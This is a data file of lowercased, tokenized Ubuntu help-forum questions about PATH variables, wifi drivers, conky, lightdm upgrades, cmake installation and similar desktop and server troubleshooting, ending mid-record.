355465	path variable can not be modified in shell function	i have one common function called setenv in a file called setenv . file setenv : setenv ( ) { export path= $ path : $ java_home/bin } file script.sh : setenv echo $ path while running ./script.sh , i can not see the updated path . please help how to solve this .
355467	error while trying to burn an audio cd with brasero	i have a problem trying to burn an audio cd with brasero , every time i try to i get this error . i really like using brasero .
355470	disable nf_conntrack	how would i go about disabling the nf_conntrack module in ubuntu 12.04 ? i am trying to run an haproxy on an ubuntu server , and nf_conntrack is giving me problems when it is running . i have n't been able to find any documentation on disabling it . thank you
355471	how to play race the sun in full screen 12.04 unity	i have been playing `` racethesun '' on ubuntu 12.04 using unity-3d ( desktop ) with compiz . however , it seems it does not have an option to go full screen , neither in the game options or on the window controls . i have read this forum post about changing unity3d ( game engine ) settings from command line : http : //flippfly.com/forum/beta-testers-1/linux-fullscreen-and-general-game-issues/ however this seems only to resize the window size , the window still has decoration and the launcher/top-bar still show over the application . is there a way around this , to play the game in full screen ?
355479	conky has no transparency	ca n't find an awnser to this . i have no idea why conky is n't working properly . here 's a screenshot : also here 's my conky file : ** # ============================================================================== # conkyrc_orange # # author : slk # version : v2011011601 # license : distributed under the terms of gnu gpl version 2 or later # # ============================================================================== background yes update_interval 1 cpu_avg_samples 2 net_avg_samples 2 temperature_unit celsius double_buffer yes no_buffers yes text_buffer_size 2048 gap_x 10 gap_y 30 minimum_size 190 450 maximum_width 190 own_window yes own_window_type override own_window_transparent yes own_window_argb_visual no own_window_argb_value 0 own_window_hints undecorate , sticky , skip_taskbar , skip_pager , below border_inner_margin 0 border_outer_margin 0 alignment tr draw_shades no draw_outline no draw_borders no draw_graph_borders no override_utf8_locale yes use_xft yes xftfont caviar dreams : size=8 xftalpha 0.5 uppercase no default_color ffffff color1 dddddd color2 aaaaaa color3 888888 color4 ef5a29 lua_load ~/.conky/conky_orange.lua lua_draw_hook_post main # $ { voffset 35 } # $ { goto 95 } $ { color3 } $ { font ubuntu : size=32 } $ { time % e } $ { color1 } $ { voffset 0 } $ { offset -60 } $ { font ubuntu : size=10 } $ { time % a } # $ { goto 85 } $ { color2 } $ { voffset -2 } $ { font ubuntu : size=9 } $ { time % b } $ { voffset -2 } $ { color3 } $ { font ubuntu : size=12 } $ { time % y } $ { font } # # $ { voffset 70 } text $ { voffset 35 } $ { goto 95 } $ { color4 } $ { font ubuntu : size=22 } $ { time % e } $ { color1 } $ { offset -50 } $ { font ubuntu : size=10 } $ { time % a } $ { goto 85 } $ { color2 } $ { voffset -2 } $ { font ubuntu : size=9 } $ { time % b } $ { voffset -2 } $ { color3 } $ { font ubuntu : size=12 } $ { time % y } $ { font } $ { voffset 80 } $ { goto 90 } $ { font ubuntu : size=7 , weight : bold } $ { color } cpu $ { goto 90 } $ { font ubuntu : size=7 , weight : normal } $ { color1 } $ { top name 1 } $ { alignr } $ { top cpu 1 } % $ { goto 90 } $ { font ubuntu : size=7 , weight : normal } $ { color2 } $ { top name 2 } $ { alignr } $ { top cpu 2 } % $ { goto 90 } $ { font ubuntu : size=7 , weight : normal } $ { color3 } $ { top name 3 } $ { alignr } $ { top cpu 3 } % $ { goto 90 } $ { cpugraph 10,100 666666 666666 } $ { goto 90 } $ { voffset -10 } $ { font ubuntu : size=7 , weight : normal } $ { color } $ { threads } process $ { voffset 20 } $ { goto 90 } $ { font ubuntu : size=7 , weight : bold } $ { color } mem $ { goto 90 } $ { font ubuntu : size=7 , weight : normal } $ { color1 } $ { top_mem name 1 } $ { alignr } $ { top_mem mem 1 } % $ { goto 90 } $ { font ubuntu : size=7 , weight : normal } $ { color2 } $ { top_mem name 2 } $ { alignr } $ { top_mem mem 2 } % $ { goto 90 } $ { font ubuntu : size=7 , weight : normal } $ { color3 } $ { top_mem name 3 } $ { alignr } $ { top_mem mem 3 } % $ { voffset 15 } $ { goto 90 } $ { font ubuntu : size=7 , weight : bold } $ { color } disks $ { goto 90 } $ { diskiograph 30,100 666666 666666 } $ { voffset -30 } $ { goto 90 } $ { font ubuntu : size=7 , weight : normal } $ { color } used : $ { fs_used /home } /home $ { goto 90 } $ { font ubuntu : size=7 , weight : normal } $ { color } used : $ { fs_used / } / $ { voffset 10 } $ { goto 70 } $ { font ubuntu : size=18 , weight : bold } $ { color3 } net $ { alignr } $ { color2 } $ { font ubuntu : size=7 , weight : bold } $ { color1 } $ { if_up eth0 } eth $ { addr eth0 } $ { endif } $ { if_up wlan0 } wifi $ { addr wlan0 } $ { endif } $ { goto 90 } $ { font ubuntu : size=7 , weight : bold } $ { color } open ports : $ { alignr } $ { color2 } $ { tcp_portmon 1 65535 count } $ { goto 90 } $ { font ubuntu : size=7 , weight : bold } $ { color } $ { offset 10 } ip $ { alignr } dport $ { goto 90 } $ { font ubuntu : size=7 , weight : normal } $ { color1 } $ { tcp_portmon 1 65535 rip 0 } $ { alignr 1 } $ { tcp_portmon 1 65535 rport 0 } $ { goto 90 } $ { font ubuntu : size=7 , weight : normal } $ { color1 } $ { tcp_portmon 1 65535 rip 1 } $ { alignr 1 } $ { tcp_portmon 1 65535 rport 1 } $ { goto 90 } $ { font ubuntu : size=7 , weight : normal } $ { color1 } $ { tcp_portmon 1 65535 rip 2 } $ { alignr 1 } $ { tcp_portmon 1 65535 rport 2 } $ { goto 90 } $ { font ubuntu : size=7 , weight : normal } $ { color1 } $ { tcp_portmon 1 65535 rip 3 } $ { alignr 1 } $ { tcp_portmon 1 65535 rport 3 } $ { goto 90 } $ { font ubuntu : size=7 , weight : normal } $ { color1 } $ { tcp_portmon 1 65535 rip 4 } $ { alignr 1 } $ { tcp_portmon 1 65535 rport 4 } $ { goto 90 } $ { font ubuntu : size=7 , weight : normal } $ { color1 } $ { tcp_portmon 1 65535 rip 5 } $ { alignr 1 } $ { tcp_portmon 1 65535 rport 5 } $ { goto 90 } $ { font ubuntu : size=7 , weight : normal } $ { color1 } $ { tcp_portmon 1 65535 rip 6 } $ { alignr 1 } $ { tcp_portmon 1 65535 rport 6 } $ { goto 90 } $ { font ubuntu : size=7 , weight : normal } $ { color1 } $ { tcp_portmon 1 65535 rip 7 } $ { alignr 1 } $ { tcp_portmon 1 65535 rport 7 } $ { goto 90 } $ { font ubuntu : size=7 , weight : normal } $ { color1 } $ { tcp_portmon 1 65535 rip 8 } $ { alignr 1 } $ { tcp_portmon 1 65535 rport 8 } $ { goto 90 } $ { font ubuntu : size=7 , weight : normal } $ { color1 } $ { tcp_portmon 1 65535 rip 9 } $ { alignr 1 } $ { tcp_portmon 1 65535 rport 9 } $ { goto 90 } $ { font ubuntu : size=7 , weight : normal } $ { color1 } $ { tcp_portmon 1 65535 rip 10 } $ { alignr 1 } $ { tcp_portmon 1 65535 rport 10 } $ { goto 90 } $ { font ubuntu : size=7 , weight : normal } $ { color1 } $ { tcp_portmon 1 65535 rip 11 } $ { alignr 1 } $ { tcp_portmon 1 65535 rport 11 } $ { goto 90 } $ { font ubuntu : size=7 , weight : normal } $ { color1 } $ { tcp_portmon 1 65535 rip 12 } $ { alignr 1 } $ { tcp_portmon 1 65535 rport 12 } $ { goto 90 } $ { font ubuntu : size=7 , weight : normal } $ { color1 } $ { tcp_portmon 1 65535 rip 13 } $ { alignr 1 } $ { tcp_portmon 1 65535 rport 13 } $ { goto 90 } $ { font ubuntu : size=7 , weight : normal } $ { color1 } $ { tcp_portmon 1 65535 rip 14 } $ { alignr 1 } $ { tcp_portmon 1 65535 rport 14 } **
355480	parallel command run in linux	i was using the following bash script to run multiple commands in parallel . it actually waits till all of the parallel commands get finished and then proceeds . now , i want to change this bash in a way that waits only for the first `` kill '' and it does not matter that this kill comes from which command 's execution . any suggestion for doing that ? for cmd in `` $ @ '' ; do { echo `` process \ '' $ cmd\ '' started '' ; $ cmd & pid= $ ! pid_list+= '' $ pid '' ; } done trap `` kill $ pid_list '' sigint echo `` parallel processes have started '' ; wait $ pid_list echo echo `` all processes have completed '' ;
355483	retrieving backed-up files from ubuntu 1 on different machine	i used deja-dup to back up a number of directories ( containing scripts , images , data files etc . ) from my work machine onto my work ubuntu 1 account ( a series of .sigtar.gz and .difftar.gz files ) . i 'm now working remotely on my personal machine - how can i retrieve/restore these files onto my personal machine ? if i open deja-dup on my personal machine , it only reflects the back-ups on my personal ubuntu 1 account .
355485	ubuntu is in command mode how to turn on the gui mode again ?	i have hp probook 4540s with radeon graphic card , i downloaded drivers from this site and installed those after reboot i couldnt see my launcher and toolbar but yes i could use few shortkeys , i looked for problem and run that dconf reset -f /org/compiz/ unity -- reset-icons & disown and this command sudo apt-get purge fglrx lightdm & & sudo apt-get install lightdm ubuntu-desktop on the terminal , web link of the page after running the last command i restarted and now no gui comes up its just black command line interface and ask for my user name and password . i have no idea how to get this back to normal help !
355494	how would i go about connecting to a network drive from a vpn using cisco anyconnect ?	i am using ubuntu 12.04 and am pretty new to it all but in order to continue using ubuntu i absolutely have to be able to connect to this network drive for my work . when i am using windows 7 it allowed me to connect and then map the drive permanently as a network drive . any ideas ? some additional info . i am able to connect to the vpn completely fine . however once i connect , i do n't really see a way to add the network drive . i know that there is a connect to network option but i messed around with that and had no luck .
355498	script to automate remapping keys ?	when i use windows i currently use autohotkey to re-map keys ( i swapped keyboards on my laptop ) . is there any way i can do this in ubuntu via a script which i can just double-click from the desktop ? or can autohotkey/anything similar be used on ubuntu ? any example is most welcome- say remap the insert key to the home key ?
355500	using image base installation with xen lvm installation problem	i have installed xen according to guide that is pointed here . in that installation lvm is used . i want to know whether it is possible to create a image with : dd if=/dev/zero of=ubuntu.img bs=1 count=1 seek=8g and install ubuntu . i have done it and it was possible to finish ubuntu installation to that image but when i start my ubuntu guest dom it show boot menu but i cant processed from that .
355506	how to install canon mx870 wireless printer in ubuntu 13.10 ?	i have tried all the solutions in the faqs ( askubuntu.com ) and googled solutions but have not been able to get the printer to work . it installs just great but print jobs only get held in the print queue . please help if you have had success with the saucy ubuntu . it has a sweet taste , with the odd clove in it ?
355507	what is the most appropriate way to get nautilus 3.8 on ubuntu 13.04 ?	ubuntu 13.04 comes with nautilus 3.6 which disables expansion of folders in the listview mode . i 've really tried this workflow for a good month or so - and it 's not working for me . nautilus authors mentioned that the abilisy to expand folders in treeview has been reinstated in 3.8 . what is the most appropriate way to obtain nautilus 3.8 that 'll be upgrade-proof and not so hacky ?
355514	`ubuntu -- vg-swap_1 is not ready or not present` whenever i boot , what it means ?	every day since i installed ubuntu 13.04 i get an error when i boot . it 's like this : the write station for /dev/mapper/ubuntu -- vg-swap_1 is not ready or not present ( i 'm dutch so it can be different with english ) . after 10 seconds the mouse will show up , and i 'm able to login . it happens every time , but ubuntu uses the swap , when i start some vm 's .
355515	could not write bytes broken pipe 12.04	i have installed ubuntu 12.04 along with windows vista as dual boot.it was working fine . but ubuntu was having some issue with the mousepad . so i installed and removed some pakages unknowing what they do . and now while booting ubuntu , i am getting an error `` could not write bytes : broken pipe '' and it does nothing after showing this message . i tried may things like upgrading grub , lightdm restart etc . but still the same error . can someone help me on this ? i am stuck .
355519	does ubuntu sdk include entire qt toolchain ?	does the ubuntu sdk include all of qt , or only a subset ? if i have existing ( non-ui ) components/libraries developed under qt , can i use them in a ubuntu/unity/ubuntu touch application ? generally , for sophisticated non-ui components of an ubuntu application , for which javascript is not appropriate , is the recommended platform qt , vanilla c++ , or something else ?
355522	ubuntu 12.04 thinks my wireless network is hidden ( but it 's not )	i 've just installed ubuntu in a dual boot linux/windows setup on an ageing dell inspiron 1520 . after searching answers on here i got past the broadcom wireless card/no connectivity issue and the missing splash screens/nvidia proprietary drivers issue , but this one has me beat . my wireless router is broadcasting its ssid correctly - it is definitely not hidden . the router is set to broadcast the ssid and other devices pick it up fine . however on boot ubuntu shows no available networks for connection . after poking around i managed to set up a connection manually via 'connect to hidden wireless network ' . this works fine until a reboot , at which point i have to reconnect manually ( the connection i set up remains in the drop-down list ) . if i disconnect without rebooting , the network remains listed under wireless networks and i can reconnect with a single click . i 've tried changing all available wireless switches ( wifi catcher etc ) in the bios and all combinations of the 'connect automatically ' and 'available to all users ' tickboxes in the 'edit connections ' dialogue , but no result . this is more a convenience thing than a deal breaker but any suggestions would be gratefully received .
355525	wifi not working after latest update	i recently updated ubuntu 13.04 and since then the wifi does not work . it does not even show up in the drop down menu by the clock . drivers are installed still and ndiswrapper is there , here is some info hope it helps . iwconfig lo no wireless extensions . eth0 no wireless extensions . usb0 no wireless extensions . ifconfig eth0 link encap : ethernet hwaddr 00 : e0 : b8 : e4 : a7 : e9 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:5350 errors:0 dropped:0 overruns:0 frame:0 tx packets:5350 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:442173 ( 442.1 kb ) tx bytes:442173 ( 442.1 kb ) usb0 link encap : ethernet hwaddr 02:50:56:54:61:61 inet addr:192.168.42.234 bcast:192.168.42.255 mask:255.255.255.0 inet6 addr : fe80 : :50:56ff : fe54:6161/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:79704 errors:0 dropped:0 overruns:0 frame:0 tx packets:55609 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:112940929 ( 112.9 mb ) tx bytes:7081971 ( 7.0 mb ) and i 'm also getting this sudo modprobe ndiswrapper error : could not insert 'ndiswrapper ' : exec format error additional info ndiswrapper -l mrv8335 : driver installed netmw14x : driver installed device ( 11ab:2a08 ) present
355527	terminal : running processes interpretation	i have written a program in the eclipse environment . first i execute it from eclipse . after that from the terminal window i view the list of my processes . now i execute that program from command line and view the list of processes . i see the process is listed with different states : when the program is executed from eclipse the state is s , when the program is executed from the terminal , the state is s+ . what is the reason ?
355535	file recovery after fsck	i was trying to copy some data from my hard disk with an external usb box . suddenly , after a bad unmount , partitions became not more visible ... so i used `` fsck '' . now i can mount partitions but i ca n't see any file , also as admin ( gksu nautilus ) , except a `` lost+found '' dir . where are my files ? : - (
355536	unity integration plus non-ubuntu linux compatibility ?	can i write an application that integrates with unity but does not depend on it , in case it is not available ?
355538	newbie - downloads slow on wireless , long time to connect to wireless	its taking a long time to connect to the wireless , and when it does , the internet in general seems unstable and really slow , like 45 mins to download a 50mb file on a 30mb connection . i switch to wired and get fab speeds . i found a utility on another forum that got some info from linux , but as im a newbie at all this , i dont know if thats everything . thanks a lot in advance http : //pastebin.com/gu52nt1l
355545	mass copy files of specific extensions to folder	i recently recovered a drive that was corrupted . it has a ton of extra files i do not need but i do need to copy files by extension over to the new location , eg : .jpg .png .mov .mp4 .wav .pdf .doc ext , ther are held in multiple sub directories along with a lot of crap files . like .java and .txts
355548	fn keys to change keyboard blacklights not working	the fn + f3 and fn + f4 are not working , the others seem to be working fine . this is what i tried to do to fix it : i opened the grub file using gedit , changed the permission . changed : rub_cmdline_linux_default=”quiet splash “ into : rub_cmdline_linux_default=”quiet splash acpi_backlight=vendor“ but i ca n't save the file , because it could n't store a copy . any advice ? edit : sometimes they seem to work , sometimes notting happens . i can turn on the lights using fn + f4 and by repeadetly clicking fn + f3 and f4 , they will eventually turn off . wtf
355550	ubuntu screen freezes on startup but can here login sound ?	so i just installed ubuntu on my laptop and the installation went reletively okay . but when i bought ubuntu from grub i get the usual ubuntu startup splash screen and it then just stays on that screen . i can here a bongo login sound , but the screen does n't change . i 've ran a live version of my usb pen and that works fine . does anybody have an idea how to fix this ? it 's running alongside windows 8 and i 've run boot repair from the live run .
355561	missing 32-bit libraries , how to i find the missing components that i need ?	you are missing the following 32-bit libraries , and steam may not run : libc.so.6 what is libc.so.6 and how do i acquire it ?
355563	setting up open vpn	thanks thomas w i have now continued with the steps on setting up the vpn however i am not able to enable the the ufw i get error messages i was able to disable and restart the terminal , but not enable . the error message was : iptable-restore v1.4.12 ca n't set policy on 'forward ' line 4 bad policy name ip6tables-restore v11.4.12 could n't load target 'accept ' : no such file or directory . i am following these steps below . i am on step 11 . easiest way to setup ubuntu as a vpn server thanks
355565	how to install latest cmake version in linux/ubuntu from command line ?	i am trying to install latest cmake in my linux box and i am always getting the below exception - username @ phx5qa01c-4e23 : ~/build $ wget http : //www.cmake.org/files/v2.8/cmake-2.8.11.tar.gz -- 2013-10-08 14:39:55 -- http : //www.cmake.org/files/v2.8/cmake-2.8.11.tar.gz resolving www.cmake.org ... 66.194.253.19 connecting to www.cmake.org|66.194.253.19|:80 ... failed : connection timed out . retrying . -- 2013-10-08 14:40:17 -- ( try : 2 ) http : //www.cmake.org/files/v2.8/cmake-2.8.11.tar.gz connecting to www.cmake.org|66.194.253.19|:80 ... failed : connection timed out . retrying . -- 2013-10-08 14:40:40 -- ( try : 3 ) http : //www.cmake.org/files/v2.8/cmake-2.8.11.tar.gz connecting to www.cmake.org|66.194.253.19|:80 ... it is always retrying ... any thoughts ? does anyone know what wrong i am doing here ? or is there any better way of installing latest version of cmake in my linux box ? username @ phx5qa01c-4e23 : ~/build $ uname -a linux phx5qa01c-4e23 2.6.35-22-server # 33-ubuntu smp sun sep 19 20:48:58 utc 2010 x86_64 gnu/linux
355567	ubuntu13.04 64-bit software update fails	ubuntu 13.04 64-bit desktop 2013/10/07 . default update manager fails , so the following transpired : $ sudo apt-get update ign file : apt-build release.gpg get:1 file : apt-build release [ 107 b ] err file : apt-build/main i386 packages file not found ... fetched 863 kb in 28s ( 30.2 kb/s ) w : failed to fetch file : /var/cache/apt-build/repository/dists/apt-build/main/binary-i386/packages file not found e : some index files failed to download . they have been ignored , or old ones used instead .
355568	thinkpad t430 with dual dvi and bumblebee . detects the vga port on my dock but not the dvi	i am running a 12.04 64bit config on a t430 . bumblebee/optirun are functioning well : glxgears normally : 61.037fps glxgears optirun : 1135.062 if a co-worker drops her windows laptop into my docking station the dvi ports work fine so it 's not the dock . i 'm pretty sure my laptop is fine as well but ca n't verify it that i know of . if i run `` sudo optirun -b auto nvidia-settings '' it says it does n't see me running a nvidia x driver . there is also nothing in the ubuntu display control panel for the monitors .
355570	which ubuntu i should install on this laptop ?	im using windows 8 my system is : intel core2duo t6400 2.0 ghz 2mb cache 6 gb ddr3 1033 mhz ram nvidia 9600mgs gpu and i have 500 gb hdd i love to play games so i prefer windows 8 for games but i would lıke to use ubuntu for my daily use i am thinking to use it alongside with windows 8 it is possible right ? should i install 12.04 or 13.04 also i use 64 bit windows so i should use 64bit ubuntu right ? thank you for your answers
355571	is there any way i can connect my samsung hd400ld ndas network drive ?	as the title says , i have a samsung hd400ld ndas drive connected to my network , i also had to install a specific driver + some kind of tool in windows to be able to connect , anyone have had this problem solved in some way except by inserting the usb cable ?
355572	wireless card showing in one place and not another ?	i 'm having a strange problem that i have n't been able to find an answer to after a few hours of google . ubuntu server version 12.04. lspci -v shows my wireless card , as such : network controller : broadcom corporation bcm4318 [ airforce one 54g ] 802.11g wireless lan controller ( rev 02 ) subsystem : linksys wmp54gs v1.1 802.11g wireless-g pci adapter with speedbooster flags : bus master , fast devsel , latency 64 , irq 16 memory at fe9fc000 ( 32-bit , non-prefetchable ) [ size=8k ] kernel driver in use : b43-pci-bridge kernel modules : ssb however , ifconfig shows : eth0 link encap : ethernet hwaddr 00:12:3f : d4:6c : d2 inet addr:192.168.2.14 bcast:192.168.2.255 mask:255.255.255.0 inet6 addr : fe80 : :212:3fff : fed4:6cd2/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:318642 errors:0 dropped:0 overruns:0 frame:0 tx packets:36376 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:89728370 ( 89.7 mb ) tx bytes:7303647 ( 7.3 mb ) interrupt:17 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) and iwconfig shows : lo no wireless extensions . eth0 no wireless extensions . how do i get my wireless card to be shown as a valid network adapter for the network configuration commands ? the computer is clearly reading it , as per lspci .
355575	install problem	i 'm trying to install ubuntu 12.04 lts alongside win 7 , but each time it gets past the ( install ubuntu in windows 7 ) option it just stops and ejects the cd asking me to press the enter key . after this it just boots back into windows . and when i try to install with my network connection enabled , i get a ( 6136 ) terminated by signal 15 error ( nm dispatcher action caught signal 15 shutting down . ) unallocated space - 70gb on c drive .
355576	error to install lightdm because of plymouth	when i use this command sudo apt-get update , the output is as follows : hit http : //security.ubuntu.com raring-security release.gpg hit http : //us.archive.ubuntu.com raring release.gpg hit http : //us.archive.ubuntu.com raring release hit http : //security.ubuntu.com precise-security release.gpg hit http : //archive.canonical.com raring release.gpg hit http : //extras.ubuntu.com raring release.gpg hit http : //ppa.launchpad.net raring release.gpg hit http : //security.ubuntu.com raring-security release hit http : //us.archive.ubuntu.com raring/main sources hit http : //security.ubuntu.com precise-security release hit http : //us.archive.ubuntu.com raring/restricted sources hit http : //archive.canonical.com precise release.gpg hit http : //extras.ubuntu.com precise release.gpg hit http : //ppa.launchpad.net raring release.gpg hit http : //bg.archive.ubuntu.com precise release.gpg hit http : //security.ubuntu.com raring-security/main sources hit http : //us.archive.ubuntu.com raring/universe sources hit http : //archive.canonical.com raring release hit http : //security.ubuntu.com raring-security/restricted sources hit http : //us.archive.ubuntu.com raring/multiverse sources hit http : //extras.ubuntu.com raring release hit http : //ppa.launchpad.net raring release hit http : //bg.archive.ubuntu.com precise-updates release.gpg hit http : //security.ubuntu.com raring-security/universe sources hit http : //us.archive.ubuntu.com raring/main amd64 packages hit http : //archive.canonical.com precise release hit http : //security.ubuntu.com raring-security/multiverse sources hit http : //extras.ubuntu.com precise release hit http : //us.archive.ubuntu.com raring/restricted amd64 packages hit http : //ppa.launchpad.net raring release hit http : //bg.archive.ubuntu.com precise release hit http : //security.ubuntu.com raring-security/main amd64 packages hit http : //us.archive.ubuntu.com raring/universe amd64 packages hit http : //archive.canonical.com raring/partner sources hit http : //extras.ubuntu.com raring/main sources hit http : //security.ubuntu.com raring-security/restricted amd64 packages hit http : //us.archive.ubuntu.com raring/multiverse amd64 packages hit http : //ppa.launchpad.net raring/main amd64 packages hit http : //security.ubuntu.com raring-security/universe amd64 packages hit http : //us.archive.ubuntu.com raring/main i386 packages hit http : //bg.archive.ubuntu.com precise-updates release hit http : //archive.canonical.com raring/partner amd64 packages hit http : //extras.ubuntu.com raring/main amd64 packages hit http : //security.ubuntu.com raring-security/multiverse amd64 packages hit http : //ppa.launchpad.net raring/main i386 packages hit http : //us.archive.ubuntu.com raring/restricted i386 packages hit http : //security.ubuntu.com raring-security/main i386 packages hit http : //us.archive.ubuntu.com raring/universe i386 packages hit http : //archive.canonical.com raring/partner i386 packages hit http : //bg.archive.ubuntu.com precise/main sources hit http : //extras.ubuntu.com raring/main i386 packages hit http : //security.ubuntu.com raring-security/restricted i386 packages hit http : //us.archive.ubuntu.com raring/multiverse i386 packages hit http : //security.ubuntu.com raring-security/universe i386 packages hit http : //bg.archive.ubuntu.com precise/restricted sources hit http : //security.ubuntu.com raring-security/multiverse i386 packages hit http : //us.archive.ubuntu.com raring/main translation-en hit http : //bg.archive.ubuntu.com precise/universe sources hit http : //ppa.launchpad.net raring/main amd64 packages hit http : //archive.canonical.com precise/partner sources hit http : //extras.ubuntu.com precise/main sources hit http : //ppa.launchpad.net raring/main i386 packages hit http : //us.archive.ubuntu.com raring/multiverse translation-en hit http : //security.ubuntu.com raring-security/main translation-en hit http : //bg.archive.ubuntu.com precise/multiverse sources hit http : //archive.canonical.com precise/partner amd64 packages hit http : //extras.ubuntu.com precise/main amd64 packages hit http : //us.archive.ubuntu.com raring/restricted translation-en hit http : //security.ubuntu.com raring-security/multiverse translation-en hit http : //bg.archive.ubuntu.com precise/main amd64 packages hit http : //archive.canonical.com precise/partner i386 packages hit http : //extras.ubuntu.com precise/main i386 packages hit http : //us.archive.ubuntu.com raring/universe translation-en hit http : //security.ubuntu.com raring-security/restricted translation-en hit http : //bg.archive.ubuntu.com precise/restricted amd64 packages hit http : //security.ubuntu.com raring-security/universe translation-en hit http : //bg.archive.ubuntu.com precise/universe amd64 packages hit http : //security.ubuntu.com precise-security/main sources hit http : //security.ubuntu.com precise-security/restricted sources hit http : //bg.archive.ubuntu.com precise/multiverse amd64 packages hit http : //security.ubuntu.com precise-security/universe sources hit http : //security.ubuntu.com precise-security/multiverse sources hit http : //bg.archive.ubuntu.com precise/main i386 packages hit http : //security.ubuntu.com precise-security/main amd64 packages hit http : //security.ubuntu.com precise-security/restricted amd64 packages hit http : //bg.archive.ubuntu.com precise/restricted i386 packages hit http : //security.ubuntu.com precise-security/universe amd64 packages hit http : //security.ubuntu.com precise-security/multiverse amd64 packages hit http : //security.ubuntu.com precise-security/main i386 packages hit http : //bg.archive.ubuntu.com precise/universe i386 packages ign http : //us.archive.ubuntu.com raring/main translation-en_us hit http : //bg.archive.ubuntu.com precise/multiverse i386 packages hit http : //security.ubuntu.com precise-security/restricted i386 packages ign http : //us.archive.ubuntu.com raring/multiverse translation-en_us hit http : //security.ubuntu.com precise-security/universe i386 packages hit http : //security.ubuntu.com precise-security/multiverse i386 packages ign http : //us.archive.ubuntu.com raring/restricted translation-en_us ign http : //us.archive.ubuntu.com raring/universe translation-en_us hit http : //security.ubuntu.com precise-security/main translation-en hit http : //security.ubuntu.com precise-security/multiverse translation-en hit http : //bg.archive.ubuntu.com precise/main translation-en hit http : //security.ubuntu.com precise-security/restricted translation-en hit http : //security.ubuntu.com precise-security/universe translation-en hit http : //bg.archive.ubuntu.com precise/multiverse translation-en ign http : //ppa.launchpad.net raring/main translation-en_us ign http : //archive.canonical.com raring/partner translation-en_us ign http : //ppa.launchpad.net raring/main translation-en ign http : //extras.ubuntu.com raring/main translation-en_us hit http : //bg.archive.ubuntu.com precise/restricted translation-en ign http : //archive.canonical.com raring/partner translation-en ign http : //ppa.launchpad.net raring/main translation-en_us ign http : //extras.ubuntu.com raring/main translation-en ign http : //archive.canonical.com precise/partner translation-en_us ign http : //extras.ubuntu.com precise/main translation-en_us ign http : //archive.canonical.com precise/partner translation-en hit http : //bg.archive.ubuntu.com precise/universe translation-en ign http : //extras.ubuntu.com precise/main translation-en hit http : //bg.archive.ubuntu.com precise-updates/main sources ign http : //ppa.launchpad.net raring/main translation-en hit http : //bg.archive.ubuntu.com precise-updates/restricted sources hit http : //bg.archive.ubuntu.com precise-updates/universe sources hit http : //bg.archive.ubuntu.com precise-updates/multiverse sources hit http : //bg.archive.ubuntu.com precise-updates/main amd64 packages hit http : //bg.archive.ubuntu.com precise-updates/restricted amd64 packages hit http : //bg.archive.ubuntu.com precise-updates/universe amd64 packages ign http : //security.ubuntu.com raring-security/main translation-en_us hit http : //bg.archive.ubuntu.com precise-updates/multiverse amd64 packages ign http : //security.ubuntu.com raring-security/multiverse translation-en_us hit http : //bg.archive.ubuntu.com precise-updates/main i386 packages ign http : //security.ubuntu.com raring-security/restricted translation-en_us ign http : //security.ubuntu.com raring-security/universe translation-en_us ign http : //security.ubuntu.com precise-security/main translation-en_us ign http : //security.ubuntu.com precise-security/multiverse translation-en_us hit http : //bg.archive.ubuntu.com precise-updates/restricted i386 packages ign http : //security.ubuntu.com precise-security/restricted translation-en_us ign http : //security.ubuntu.com precise-security/universe translation-en_us hit http : //bg.archive.ubuntu.com precise-updates/universe i386 packages hit http : //bg.archive.ubuntu.com precise-updates/multiverse i386 packages hit http : //bg.archive.ubuntu.com precise-updates/main translation-en hit http : //bg.archive.ubuntu.com precise-updates/multiverse translation-en hit http : //bg.archive.ubuntu.com precise-updates/restricted translation-en hit http : //bg.archive.ubuntu.com precise-updates/universe translation-en ign http : //bg.archive.ubuntu.com precise/main translation-en_us ign http : //bg.archive.ubuntu.com precise/multiverse translation-en_us ign http : //bg.archive.ubuntu.com precise/restricted translation-en_us ign http : //bg.archive.ubuntu.com precise/universe translation-en_us ign http : //bg.archive.ubuntu.com precise-updates/main translation-en_us ign http : //bg.archive.ubuntu.com precise-updates/multiverse translation-en_us ign http : //bg.archive.ubuntu.com precise-updates/restricted translation-en_us ign http : //bg.archive.ubuntu.com precise-updates/universe translation-en_us reading package lists ... and then sudo apt-get dist-upgrade . i have this output : reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done the following packages have been kept back : lightdm 0 upgraded , 0 newly installed , 0 to remove and 1 not upgraded . then i ran this command sudo apt-cache policy lightdm , i have this output : lightdm : installed : 1.6.0-0ubuntu2 candidate : 1.6.0-0ubuntu3.1 version table : 1.6.0-0ubuntu3.1 0 500 http : //security.ubuntu.com/ubuntu/ raring-security/main amd64 packages *** 1.6.0-0ubuntu2 0 500 http : //us.archive.ubuntu.com/ubuntu/ raring/main amd64 packages 100 /var/lib/dpkg/status 1.2.3-0ubuntu2.3 0 500 http : //bg.archive.ubuntu.com/ubuntu/ precise-updates/main amd64 packages 1.2.1-0ubuntu1 0 500 http : //bg.archive.ubuntu.com/ubuntu/ precise/main amd64 packages then , i ran this command : apt-cache policy plymouth , and i got this output : plymouth : installed : 0.8.8-0ubuntu6 candidate : 0.8.8-0ubuntu6 version table : *** 0.8.8-0ubuntu6 0 500 http : //us.archive.ubuntu.com/ubuntu/ raring/main amd64 packages 100 /var/lib/dpkg/status 0.8.2-2ubuntu31.1 0 500 http : //bg.archive.ubuntu.com/ubuntu/ precise-updates/main amd64 packages 0.8.2-2ubuntu30 0 500 http : 